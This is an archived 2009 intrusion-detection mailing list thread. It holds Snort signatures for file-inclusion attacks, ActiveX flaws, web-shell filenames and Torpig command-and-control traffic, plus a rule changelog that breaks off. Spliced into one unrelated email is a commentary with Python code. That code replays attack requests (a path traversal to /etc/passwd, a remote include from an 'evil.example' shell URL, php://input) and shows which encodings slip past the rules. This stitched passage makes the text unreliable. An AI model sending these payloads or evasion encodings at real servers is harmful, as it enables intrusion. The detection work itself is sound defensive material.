WEB-ATTACKS PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite"; flow:to_client,established; content:"CLSID"; nocase; content:"6C951D10-B07F-11DB-A6ED-0050C2490048"; nocase; distance:0; pcre:"/(SaveBarCode|SaveEnhWMF)/i"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8332; reference:url,securityfocus.com/archive/1/502319; sid:2009124; rev:1;)

Looking forward to your comments, if any...

Thanks & Regards,
StillSecure

From pepperjack at afferentsecurity.com Thu May 7 08:43:41 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Thu, 07 May 2009 07:43:41 -0500
Subject: [Emerging-Sigs] Zbot,Zues,WsPoem > v1.2.x.x Signatures
References: <1241532428.6818.7.camel@kinta> <4A01C8F1.1030206@jonkmans.com>
Message-ID: <20090507074341.itzyfaeiw4gco4cg@mail.afferentsecurity.com>

hey I just realized an oversight on my part: I put two rulesets for zeus on my website (in Feb), and forgot to tell anyone they were there. :*)

They rebuild nightly based on updates at abuse.ch

http://www.autoshun.org/downloads/zeusIP.rules
http://www.autoshun.org/downloads/zeusdomains.rules

jp

--
Framework? I don't need no stinking framework!
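One caveat on the WeBid include_path rules StillSecure submitted above: the script name and parameter are matched with uricontent, but the traversal is matched with a plain content:"../". In Snort 2.x, uricontent and a pcre with the /U modifier run against the URI after http_inspect has normalized it (percent-decoding included), while a bare content runs against the raw payload, so a request that encodes the traversal as %2e%2e%2f reaches the PHP include the same way but slides past the rule; a uricontent:"../" would see the decoded form. The Python below is an added example, not the submitted rules and not StillSecure's or Snort's code: it replays both variants of the LFI check and the RFI pcre over constructed request lines (hostnames and paths are made up) and also shows a double-encoded request that neither variant catches after a single decoding pass, which is the case http_inspect's double_decode option exists for.

```python
# Added example, not StillSecure's rules and not Snort: replays the WeBid
# include_path checks over constructed request lines to show what a raw
# content:"../" misses that a uricontent:"../" (normalized URI) would catch.
import re
from urllib.parse import unquote

# Constructed sample request lines (hostnames and paths are assumptions).
SAMPLE_REQUESTS = [
    "GET /webid/cron.php?include_path=../../../../etc/passwd%00 HTTP/1.1",
    "GET /webid/cron.php?include_path=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1",
    "GET /webid/ST_browsers.php?include_path=http://evil.example/shell.txt? HTTP/1.1",
    "GET /webid/ST_countries.php?include_path=%20php://input HTTP/1.1",
    "GET /webid/cron.php?include_path=%252e%252e%252fetc%252fpasswd HTTP/1.1",
    "GET /webid/cron.php?include_path=/var/www/webid/includes/ HTTP/1.1",
]

# The uricontent anchors shared by the eight submitted WeBid rules (nocase).
WEBID_SCRIPTS = ("/cron.php?", "/st_browsers.php?", "/st_countries.php?", "/st_platforms.php?")

# The RFI pcre as submitted; /i is re.IGNORECASE and /U means "run on the
# normalized URI", which normalize_uri() supplies here.
RFI_RE = re.compile(r"include_path=\s*(https?|ftps?|php)\:\/", re.IGNORECASE)


def request_uri(line: str) -> str:
    """Return the request-URI from 'METHOD URI HTTP/x.y'."""
    parts = line.split(" ", 2)
    return parts[1] if len(parts) > 1 else ""


def normalize_uri(uri: str) -> str:
    """Approximate http_inspect's URI normalization: one pass of %XX decoding.
    Deliberately single-pass, so a double-encoded %252e only becomes %2e."""
    return unquote(uri)


def targets_webid_include(uri_norm: str) -> bool:
    """uricontent:"/cron.php?" (or one of the ST_ scripts) plus uricontent:"include_path="."""
    u = uri_norm.lower()
    return any(s in u for s in WEBID_SCRIPTS) and "include_path=" in u


def lfi_match(line: str, normalized: bool) -> bool:
    """The LFI rule. normalized=False is the submitted content:"../" on the
    raw request; normalized=True is what a uricontent:"../" would see."""
    uri = request_uri(line)
    if not targets_webid_include(normalize_uri(uri)):
        return False
    haystack = normalize_uri(uri) if normalized else line
    return "../" in haystack


def rfi_match(line: str) -> bool:
    """The RFI rule: the uricontent anchors plus the pcre on the normalized URI."""
    uri_norm = normalize_uri(request_uri(line))
    return targets_webid_include(uri_norm) and bool(RFI_RE.search(uri_norm))


def raw_only_misses(lines) -> list:
    """Requests the submitted LFI rule misses but a uricontent version catches."""
    return [l for l in lines if lfi_match(l, True) and not lfi_match(l, False)]


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(f"raw_lfi={lfi_match(line, False)!s:5} norm_lfi={lfi_match(line, True)!s:5} "
              f"rfi={rfi_match(line)!s:5}  {request_uri(line)}")
```

The plain traversal and both RFI requests are caught as written; the single-encoded traversal is caught only by the normalized check, the double-encoded one by neither, and the legitimate absolute include path by none of them. Changing content:"../" to uricontent:"../" in the four LFI rules closes the first gap without touching the rest of the rule.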
----------------------------------------------------------------
@fferent Security Labs: Isolate/Insulate/Innovate
http://www.afferentsecurity.com

From jonkman at jonkmans.com Thu May 7 11:25:31 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 07 May 2009 11:25:31 -0400
Subject: [Emerging-Sigs] StillSecure: 10 New Signatures - May-07-2009
In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C292D@webmail.latis.com>
References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C292D@webmail.latis.com>
Message-ID: <4A02FD6B.40201@jonkmans.com>

Added, thanks as always. Good set of sigs!

Matt

signatures wrote:
> Hi Matt,
>
> Please find 10 New Signatures below:
>
> 1. *WEB-PHP WeBid cron.php include_path Parameter Local File Inclusion*
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid cron.php include_path Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/cron.php?"; nocase; uricontent:"include_path="; nocase; content:"../"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009051; rev:1;)
>
> 2. *WEB-PHP WeBid cron.php include_path Parameter Remote File Inclusion*
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid cron.php include_path Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/cron.php?"; nocase; uricontent:"include_path="; nocase; pcre:"/include_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009052; rev:1;)
>
> 3. *WEB-PHP WeBid ST_browsers.php include_path Parameter Local File Inclusion*
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid ST_browsers.php include_path Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/ST_browsers.php?"; nocase; uricontent:"include_path="; nocase; content:"../"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009053; rev:1;)
>
> 4. *WEB-PHP WeBid ST_browsers.php include_path Parameter Remote File Inclusion*
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid ST_browsers.php include_path Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/ST_browsers.php?"; nocase; uricontent:"include_path="; nocase; pcre:"/include_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009054; rev:1;)
>
> 5. *WEB-PHP WeBid ST_countries.php include_path Parameter Local File Inclusion*
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid ST_countries.php include_path Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/ST_countries.php?"; nocase; uricontent:"include_path="; nocase; content:"../"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009055; rev:1;)
>
> 6. *WEB-PHP WeBid ST_countries.php include_path Parameter Remote File Inclusion*
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid ST_countries.php include_path Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/ST_countries.php?"; nocase; uricontent:"include_path="; nocase; pcre:"/include_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009056; rev:1;)
>
> 7. *WEB-PHP WeBid ST_platforms.php include_path Parameter Local File Inclusion*
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid ST_platforms.php include_path Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/ST_platforms.php?"; nocase; uricontent:"include_path="; nocase; content:"../"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009058; rev:1;)
>
> 8. *WEB-PHP WeBid ST_platforms.php include_path Parameter Remote File Inclusion*
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WeBid ST_platforms.php include_path Parameter Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/ST_platforms.php?"; nocase; uricontent:"include_path="; nocase; pcre:"/include_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8195; reference:bugtraq,34074; sid:2009059; rev:1;)
>
> 9. *WEB-ATTACKS Orbit Downloader ActiveX Control Arbitrary File Delete*
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Orbit Downloader ActiveX Control Arbitrary File Delete"; flow:to_client,established; content:"clsid"; nocase; content:"3F1D494B-0CEF-4468-96C9-386E2E4DEC90"; nocase; distance:0; content:"download"; nocase; classtype:web-application-attack; reference:bugtraq,34200; reference:url,milw0rm.com/exploits/8257; sid:1000062; rev:1;)
>
> 10. *WEB-ATTACKS PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite*
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite"; flow:to_client,established; content:"CLSID"; nocase; content:"6C951D10-B07F-11DB-A6ED-0050C2490048"; nocase; distance:0; pcre:"/(SaveBarCode|SaveEnhWMF)/i"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/8332; reference:url,securityfocus.com/archive/1/502319; sid:2009124; rev:1;)
>
> Looking forward to your comments, if any...
>
> Thanks & Regards,
> StillSecure
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From jonkman at jonkmans.com Thu May 7 11:33:19 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 07 May 2009 11:33:19 -0400
Subject: [Emerging-Sigs] Emerging-sigs Digest, Vol 18, Issue 7
In-Reply-To:
References:
Message-ID: <4A02FF3F.20804@jonkmans.com>

The ruleset has been updated. Thanks James!
matt

James McQuaid wrote:
> Hello Michael,
>
> Thank you for pointing this out. The bad stuff which previously resided here has gone. This was a reverse of 67-15-47-7.opticaljungle.com.
>
> We are deploying a database solution.
>
> James
>
>
>> 1. RBN blocks blocking Indian registrar mitsu.in (Michael Scheidell)

From jonkman at jonkmans.com Thu May 7 12:02:39 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 07 May 2009 12:02:39 -0400
Subject: [Emerging-Sigs] web server backdoors]
In-Reply-To: <1241640169.88470.21.camel@localhost>
References: <1241640169.88470.21.camel@localhost>
Message-ID: <4A03061F.6070909@jonkmans.com>

Sorry for the delay in posting these Jaime. I think these have some value. There will be false positives here and there, but for folks running web farms I think the value is obvious.

Posting now, thanks Jaime!
Matt

> Hi, I was reading this article:
> http://ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
>
> I wrote these rules related to the article's information:
>
> cfexec.cfm
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB cfexec.cfm access"; flow:established,to_server; content:"GET "; depth:4; uricontent:"cfexec.cfm"; nocase; classtype:trojan-activity; reference:url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html; sid:; rev:1;)
>
> cmdasp.asp
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB cmdasp.asp access"; flow:established,to_server; content:"GET "; depth:4; uricontent:"cmdasp.asp"; nocase; classtype:trojan-activity; reference:url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html; sid:; rev:1;)
>
> cmdasp.aspx
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB cmdasp.aspx access"; flow:established,to_server; content:"GET "; depth:4; uricontent:"cmdasp.aspx"; nocase; classtype:trojan-activity; reference:url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html; sid:; rev:1;)
>
> simple-backdoor.php
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB simple-backdoor.php access"; flow:established,to_server; content:"GET "; depth:4; uricontent:"simple-backdoor.php"; nocase; classtype:trojan-activity; reference:url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html; sid:; rev:1;)
>
> php-backdoor.php
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB php-backdoor.php access"; flow:established,to_server; content:"GET "; depth:4; uricontent:"php-backdoor.php"; nocase; classtype:trojan-activity; reference:url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html; sid:; rev:1;)
>
> jsp-reverse.jsp
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB jsp-reverse.jsp access"; flow:established,to_server; content:"GET "; depth:4; uricontent:"jsp-reverse.jsp"; nocase; classtype:trojan-activity; reference:url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html; sid:; rev:1;)
>
> perlcmd.cgi
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB perlcmd.cgi access"; flow:established,to_server; content:"GET "; depth:4; uricontent:"perlcmd.cgi"; nocase; classtype:trojan-activity; reference:url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html; sid:; rev:1;)
>
> cmdjsp.jsp
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB cmdjsp.jsp access"; flow:established,to_server; content:"GET "; depth:4; uricontent:"cmdjsp.jsp"; nocase; classtype:trojan-activity; reference:url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html; sid:; rev:1;)
>
> cmd-asp-5.1.asp
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB cmd-asp-5.1.asp access"; flow:established,to_server; content:"GET "; depth:4; uricontent:"cmd-asp-5.1.asp"; nocase; classtype:trojan-activity; reference:url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html; sid:; rev:1;)
>
>
> Regards

From jonkman at jonkmans.com Thu May 7 12:32:04 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 07 May 2009 12:32:04 -0400
Subject: [Emerging-Sigs] IP Match Rulesets
Message-ID: <4A030D04.3070005@jonkmans.com>

The emerging-botcc, emerging-compromised, and emerging-rbn rulesets are all just straight IP matching.
They currently all look something like so:

alert ip $HOME_NET any -> [115.146.18.137,.....,174.129.231.136] any (msg:"ET DROP Known Bot C&C Server Traffic (group 1) "; reference:url,www.shadowserver.org; threshold: type limit, track by_src, seconds 3600, count 1; classtype:trojan-activity; sid:2404000; rev:1527;)

Note that these look for IP, so they're applied to udp and tcp, as well as icmp, etc.

Eoin Miller wrote in and says they're getting a huge performance gain by taking these rulesets and rewriting them into tcp and udp versions. Something like:

alert tcp $HOME_NET any -> [115.146.18.137...
alert udp $HOME_NET any -> [115.146.18.137...

Is anyone in a position where we can get a second testing of the performance gains by doing so? If it pans out in another environment we should consider changing these rulesets to this form.

Matt

From phatbuckett at gmail.com Thu May 7 13:10:05 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Thu, 7 May 2009 10:10:05 -0700
Subject: [Emerging-Sigs] Zbot,Zues,WsPoem > v1.2.x.x Signatures
In-Reply-To: <20090507074341.itzyfaeiw4gco4cg@mail.afferentsecurity.com>
References: <1241532428.6818.7.camel@kinta> <4A01C8F1.1030206@jonkmans.com> <20090507074341.itzyfaeiw4gco4cg@mail.afferentsecurity.com>
Message-ID: <839aec700905071010x7c71047ama6caf23206185ed8@mail.gmail.com>

Jack, what would you say on the prospect of scripting a set of http rules looking for the domains on Host headers in requests? In my environment we'll be less successful in detecting client->resolver communications than client->server requests.
Also unimportant typo in your .rules file, "The source URL for this http://www.autoshun.org/downloads/zeus-domain.rules" s/zeus-domain/zeusdomains

DS

On Thu, May 7, 2009 at 5:43 AM, Jack Pepper wrote:
> hey I just realized an oversight on my part:
>
> I put two rulesets for zeus on my website (in Feb), and forgot to tell anyone they were there. :*)
>
> They rebuild nightly based on updates at abuse.ch
> http://www.autoshun.org/downloads/zeusIP.rules
> http://www.autoshun.org/downloads/zeusdomains.rules
>
> jp

--
Darren Spruell
phatbuckett at gmail.com

From phatbuckett at gmail.com Thu May 7 14:11:55 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Thu, 7 May 2009 11:11:55 -0700
Subject: [Emerging-Sigs] mebroot/torpig response packet?
In-Reply-To: <1233354623.6623.56.camel@kinta>
References: <839aec700901292052m5f739539s8281c72a2d8c9605@mail.gmail.com> <1233354623.6623.56.camel@kinta>
Message-ID: <839aec700905071111s70d2cecdr5e6fcc1f234a36db@mail.gmail.com>

Picking this up again...

Two responses seen from Torpig C&Cs are:
- Simply "okn" indicating current configuration
- "okc" indicating a new configuration is available (and subsequently served? in the same response?)

It would be interesting to have rules identifying both of these conditions. I thought we might be able to count on a Content-Length header (with value of '3') as shown in responses on this thread, but the response shown in the offensivecomputing post lacks it. So anchoring on the CRLFs is all that strikes me.
Maybe worth putting modifiers on the last content check to start inspecting around where the response body might end up? 'dsize' check? Follow with a pcre to word-boundary after the "okn"?

Would someone mind also validating the distance/within on the "200" content check (or that it's not completely pointless in the first place?)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET 1024: (msg:"ET TROJAN Possible Torpig C&C response message (okn)"; flow:established,from_server; content:"HTTP/1."; depth:7; content:"200"; distance:2; within:3; content:"|0d 0a 0d 0a|okn"; nocase; classtype:trojan-activity; reference:url,offensivecomputing.net/?q=node/909; reference:url,www.cs.ucsb.edu/~seclab/projects/torpig/index.html; sid:XXXXXXX; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET 1024: (msg:"ET TROJAN Possible Torpig C&C response message (okc)"; flow:established,from_server; content:"HTTP/1."; depth:7; content:"200"; distance:2; within:3; content:"|0d 0a 0d 0a|okc"; nocase; classtype:trojan-activity; reference:url,offensivecomputing.net/?q=node/909; reference:url,www.cs.ucsb.edu/~seclab/projects/torpig/index.html; sid:XXXXXXX; rev:1;)

DS

On Fri, Jan 30, 2009 at 3:30 PM, dxp wrote:
> I would recommend not to limit the signature to "nginx" server. I have seen various distributed C&C servers of the same trojan drop that do not use "nginx". Although, it wasn't torpig but I would assume the same may show up here.
>
> I think the "okn" response as the first 3 bytes is unique enough as long as it's anchored to a HTTP response header.
>
> -
>
> -=[ dxp ]=-
> 0xA3F3C6E3
>
>
>
> On Thu, 2009-01-29 at 21:52 -0700, Darren Spruell wrote:
> > Throwing this up for commentary... any worth?
> > alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET 1024: (msg:"ET TROJAN Possible Torpig C&C response message (okn)"; flow:established,from_server; content:"HTTP/1."; depth:7; content:"|0d 0a|Server\: nginx"; nocase; distance:4; within:300; content:"|0d 0a 0d 0a|okn"; nocase; classtype:trojan-activity; reference:url,offensivecomputing.net/?q=node/909; sid:XXXXXXX; rev:1;)
> >

From emerging at emergingthreats.net Thu May 7 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Thu, 7 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090507200010.D17AA4504A@goliath.jonkmans.com>

[***] Results from Oinkmaster started Thu May 7 16:00:10 2009 [***]

[+++] Added rules: [+++]

2009306 - ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009307 - ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009308 - ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009309 - ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009310 - ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009311 - ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009312 - ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009313 - ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009314 - ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete (emerging-web.rules)
2009315 - ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite (emerging-web.rules)
2009316 - ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009317 - ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009318 - ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009319 - ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection (emerging-web_sql_injection.rules)
2009320 - ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion (emerging-web_sql_injection.rules)
2009321 - ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion (emerging-web_sql_injection.rules)
2009322 - ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution (emerging-web.rules)
2009323 - ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection (emerging-web_sql_injection.rules)
2009324 - ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009325 - ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009326 - ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009327 - ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
2009328 - ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution (emerging-web.rules)
2009329 - ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009330 - ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion (emerging-web_sql_injection.rules)
2009331 - ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion (emerging-web_sql_injection.rules)
2009332 - ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion (emerging-web_sql_injection.rules)
2009333 - ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion (emerging-web_sql_injection.rules)
2009334 - ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite (emerging-web.rules)
2009335 - ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection (emerging-web_sql_injection.rules)
2009336 - ET WEB Possible Web Backdoor cfexec.cfm access (emerging-web.rules)
2009337 - ET WEB Possible Web Backdoor cmdasp.asp access (emerging-web.rules)
2009338 - ET WEB Possible Web Backdoor cmdasp.aspx access (emerging-web.rules)
2009339 - ET WEB Possible Web Backdoor simple-backdoor.php access (emerging-web.rules)
2009340 - ET WEB Possible Web Backdoor php-backdoor.php access (emerging-web.rules)
2009341 - ET WEB Possible Web Backdoor jsp-reverse.jsp access (emerging-web.rules)
2009342 - ET WEB Possible Web Backdoor perlcmd.cgi access (emerging-web.rules)
2009343 - ET WEB Possible Web Backdoor cmdjsp.jsp access (emerging-web.rules)
2009344 - ET WEB Possible Web Backdoor cmd-asp-5.1.asp access (emerging-web.rules)

[///] Modified active rules: [///]

2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules)
2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules)
2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules)
2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules)
2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules)
2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules)
2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules)
2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules)
2406180 - ET RBN Known Russian Business Network Monitored Domains (181) (emerging-rbn.rules) 2406181 - ET RBN Known Russian Business Network Monitored Domains (182) (emerging-rbn.rules) 2406182 - ET RBN Known Russian Business Network Monitored Domains (183) (emerging-rbn.rules) 2406183 - ET RBN Known Russian Business Network Monitored Domains (184) (emerging-rbn.rules) 2406184 - ET RBN Known Russian Business Network Monitored Domains (185) (emerging-rbn.rules) 2406185 - ET RBN Known Russian Business Network Monitored Domains (186) (emerging-rbn.rules) 2406186 - ET RBN Known Russian Business Network Monitored Domains (187) (emerging-rbn.rules) 2406187 - ET RBN Known Russian Business Network Monitored Domains (188) (emerging-rbn.rules) 2406188 - ET RBN Known Russian Business Network Monitored Domains (189) (emerging-rbn.rules) 2406189 - ET RBN Known Russian Business Network Monitored Domains (190) (emerging-rbn.rules) 2406190 - ET RBN Known Russian Business Network Monitored Domains (191) (emerging-rbn.rules) 2406191 - ET RBN Known Russian Business Network Monitored Domains (192) (emerging-rbn.rules) 2406192 - ET RBN Known Russian Business Network Monitored Domains (193) (emerging-rbn.rules) 2406193 - ET RBN Known Russian Business Network Monitored Domains (194) (emerging-rbn.rules) 2406194 - ET RBN Known Russian Business Network Monitored Domains (195) (emerging-rbn.rules) 2406195 - ET RBN Known Russian Business Network Monitored Domains (196) (emerging-rbn.rules) 2406196 - ET RBN Known Russian Business Network Monitored Domains (197) (emerging-rbn.rules) 2406197 - ET RBN Known Russian Business Network Monitored Domains (198) (emerging-rbn.rules) 2406198 - ET RBN Known Russian Business Network Monitored Domains (199) (emerging-rbn.rules) 2406199 - ET RBN Known Russian Business Network Monitored Domains (200) (emerging-rbn.rules) 2406200 - ET RBN Known Russian Business Network Monitored Domains (201) (emerging-rbn.rules) 2406201 - ET RBN Known Russian Business 
Network Monitored Domains (202) (emerging-rbn.rules) 2406202 - ET RBN Known Russian Business Network Monitored Domains (203) (emerging-rbn.rules) 2406203 - ET RBN Known Russian Business Network Monitored Domains (204) (emerging-rbn.rules) 2406204 - ET RBN Known Russian Business Network Monitored Domains (205) (emerging-rbn.rules) 2406205 - ET RBN Known Russian Business Network Monitored Domains (206) (emerging-rbn.rules) 2406206 - ET RBN Known Russian Business Network Monitored Domains (207) (emerging-rbn.rules) 2406207 - ET RBN Known Russian Business Network Monitored Domains (208) (emerging-rbn.rules) 2406208 - ET RBN Known Russian Business Network Monitored Domains (209) (emerging-rbn.rules) 2406209 - ET RBN Known Russian Business Network Monitored Domains (210) (emerging-rbn.rules) 2406210 - ET RBN Known Russian Business Network Monitored Domains (211) (emerging-rbn.rules) 2406211 - ET RBN Known Russian Business Network Monitored Domains (212) (emerging-rbn.rules) 2406212 - ET RBN Known Russian Business Network Monitored Domains (213) (emerging-rbn.rules) 2406213 - ET RBN Known Russian Business Network Monitored Domains (214) (emerging-rbn.rules) 2406214 - ET RBN Known Russian Business Network Monitored Domains (215) (emerging-rbn.rules) 2406215 - ET RBN Known Russian Business Network Monitored Domains (216) (emerging-rbn.rules) 2406216 - ET RBN Known Russian Business Network Monitored Domains (217) (emerging-rbn.rules) 2406217 - ET RBN Known Russian Business Network Monitored Domains (218) (emerging-rbn.rules) 2406218 - ET RBN Known Russian Business Network Monitored Domains (219) (emerging-rbn.rules) 2406219 - ET RBN Known Russian Business Network Monitored Domains (220) (emerging-rbn.rules) 2406220 - ET RBN Known Russian Business Network Monitored Domains (221) (emerging-rbn.rules) 2406221 - ET RBN Known Russian Business Network Monitored Domains (222) (emerging-rbn.rules) 2406222 - ET RBN Known Russian Business Network Monitored Domains (223) 
